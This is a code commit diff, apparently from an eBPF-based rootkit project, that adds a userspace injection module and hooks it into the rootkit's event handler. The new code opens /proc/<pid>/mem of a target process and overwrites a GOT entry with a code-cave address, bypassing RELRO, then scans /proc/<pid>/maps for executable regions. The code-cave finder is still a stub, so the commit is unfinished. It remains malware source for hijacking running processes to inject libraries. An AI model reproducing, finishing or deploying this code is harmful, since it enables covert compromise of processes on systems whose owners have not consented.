Finished injection module at userspace using /proc/<pid>/maps, enables to overwrite the GOT section with RELRO activated

src/user/include/utils/mem/code_caver.h

@@ -0,0 +1,19 @@
+#ifndef __MEM_CODE_CAVER_H
+#define __MEM_CODE_CAVER_H
+
+#include <unistd.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <stdint.h>
+#include <fcntl.h>
+#include <sys/stat.h>
+
+#include "../common/constants.h"
+
+__u64 code_cave_find_address(__u64 min_cave_size, __u64 from, __u64 to, char flags[], __u32 pgoff, __u32 major, __u32 minor, __u64 ino){
+    //printf("%x-%x %4c %x %x:%x %lu ");
+    return 0;
+}
+
+
+#endif

src/user/include/utils/mem/injection.h

@@ -0,0 +1,62 @@
+#ifndef __MEM_INJECTION_EXT_H
+#define __MEM_INJECTION_EXT_H
+
+#include <unistd.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <stdint.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include "../common/constants.h"
+#include "../common/map_common.h"
+
+#include "code_caver.h"
+
+int manage_injection(const struct rb_event* event){
+    char mem_file_name[100];
+    __u64 buf = (__u64)CODE_CAVE_ADDRESS;
+    int mem_fd;
+
+
+    memset( (void*)mem_file_name, 0, 100);
+
+    printf("Injecting at PID %d at %llx\n", event->pid, event->got_address);
+
+    sprintf(mem_file_name, "/proc/%d/mem", event->pid);
+    mem_fd = open(mem_file_name, O_RDWR);
+    lseek(mem_fd, event->got_address, SEEK_SET);
+
+    for(int ii=0; ii<sizeof(__u64); ii++){
+        if(write(mem_fd, (void*)&buf+ii, 1) < 0 ){
+            perror("Error while writing at GOT");
+            return -1;
+        }
+    }
+
+    //Parsing /proc/pid/maps.
+    //Note that addresses usually appear as 32-bit when catting, but this is not completely true
+    //
+    char *maps_file = calloc(512, sizeof(char));
+    FILE *f;
+    sprintf(maps_file, "/proc/%d/maps", event->pid);
+    f = fopen(maps_file, "rt");
+    while (fgets(maps_file, 512, f)) {
+        __u32 pgoff, major, minor;
+        __u64 from, to, ino;
+        char flags[4];
+        int ret = sscanf(maps_file, "%llx-%llx %4c %x %x:%x %llu ", &from, &to, flags, &pgoff, &major, &minor, &ino);
+        printf("MAPS: %s\n", maps_file);
+
+        //Parse flags, find executable one
+        if(flags[2] == 'x'){
+            //Candidate for code cave finding
+            
+        }
+    }
+
+    free(maps_file);
+
+    return 0;
+}
+
+#endif

src/user/include/utils/rop/extractor.c

@@ -1,6 +0,0 @@
-#include <stdio.h>
-#include <stdlib.h>
-
-#include "extractor.h"
-
-

src/user/include/utils/rop/extractor.h

@@ -1,6 +0,0 @@
-#ifndef __ROP_EXT_H
-#define __ROP_EXT_H
-
-
-
-#endif

src/user/kit.c

@@ -20,8 +20,7 @@
 #include "include/utils/strings/regex.h"
 #include "include/utils/structures/fdlist.h"
 #include "include/modules/module_manager.h"
-#include "include/utils/rop/extractor.h"
-
+#include "include/utils/mem/injection.h"
 #define ABORT_IF_ERR(err, msg)\
 	if(err<0){\
 		fprintf(stderr, msg);\
@@ -97,7 +96,7 @@ static int handle_rb_event(void *ctx, void *data, size_t data_size){
 	tm = localtime(&t);
 	strftime(ts, sizeof(ts), "%H:%M:%S", tm);
 
-
+	//Before parsing any data, check the type
     if(e->event_type == INFO){
 		printf("%s INFO  pid:%d code:%i, msg:%s\n", ts, e->pid, e->code, e->message);
 	}else if(e->event_type == DEBUG){
@@ -106,6 +105,12 @@ static int handle_rb_event(void *ctx, void *data, size_t data_size){
 
 	}else if(e->event_type == EXIT){
 
+	}else if(e->event_type == VULN_SYSCALL){
+		//eBPF detected syscall which can lead to library injection
+		printf("%s VULN_SYSCALL  pid:%d syscall:%llx, return:%llx, libc_main:%llx, libc_dlopen_mode:%llx, libc_malloc:%llx, got:%llx, relro:%i\n", ts, e->pid, e->syscall_address, e->process_stack_return_address, e->libc_main_address, e->libc_dlopen_mode_address, e->libc_malloc_address, e->got_address, e->relro_active);
+		if(manage_injection(e)<0){
+			printf("Library injection failed\n");
+		}
 	}else{
 		printf("UNRECOGNIZED RB EVENT RECEIVED");
 		return -1;